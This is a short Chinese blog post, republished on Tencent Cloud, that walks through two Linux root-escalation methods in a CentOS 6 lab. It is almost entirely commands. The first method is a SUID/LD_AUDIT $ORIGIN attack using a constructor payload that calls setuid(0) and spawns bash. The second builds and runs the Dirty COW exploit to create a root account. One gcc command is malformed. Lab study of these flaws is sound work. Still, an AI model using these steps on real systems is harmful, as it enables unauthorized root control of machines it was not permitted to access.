介绍两种提权方式提权

TeamsSix

发布于 2019-09-24 17:58:29

2.3K0

发布于 2019-09-24 17:58:29

文章被收录于专栏：TeamsSix的网络空间安全专栏 TeamsSix的网络空间安全专栏TeamsSix的网络空间安全专栏

话不多说，进入正文

一、搭建环境

1、下载并安装实验机contos6

2、创建新用户并安装GCC

yum install gcc
yum install gcc-c++
useradd test_dora

3、切换用户，并查看用户权限与系统版本内核版本

su test_dora
id
cat /etc/shadow
uname　-an
lsb_release -a

二、suid提权

ll /tmp/ -d
cd /tmp
mkdir test_dora
ll /bin/ping
ln -s /bin/ping /tmp/test_dora/target
ll /tmp/test_dora/target
exec 3< /tmp/test_dora/target
ll /tmp/proc/$$/fd/3
vi testpayload.c
void __attribute__(()constructor) init()
{
 setuid(0);
 system("/bin/bash");
}
gcc -w -fPIC -shared -o /tmp/test_dora/testpayload.c
LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
id

三、脏牛提权

# dirtycow.c下载链接：https://github.com/dirtycow/dirtycow.github.io.git
gcc -pthread dirty1.c -o dirty1 -lcrypt
./dirty1 test_yes
su firefart
id

本文参与腾讯云自媒体分享计划，分享自微信公众号。

原始发表：2018-11-08，如有侵权请联系 cloudcommunity@tencent.com 删除

内核

权限

系统

本文分享自 TeamsSix 微信公众号，前往查看

如有侵权，请联系 cloudcommunity@tencent.com 删除。

本文参与腾讯云自媒体分享计划，欢迎热爱写作的你一起参与！

内核

权限

系统

登录后参与评论

0 条评论

热度

介绍两种提权方式提权

介绍两种提权方式提权

一、搭建环境

1、下载并安装实验机contos6

2、创建新用户并安装GCC

3、切换用户，并查看用户权限与系统版本内核版本

二、suid提权

三、脏牛提权

社区

活动

资源

关于

腾讯云开发者

热门产品

热门推荐

更多推荐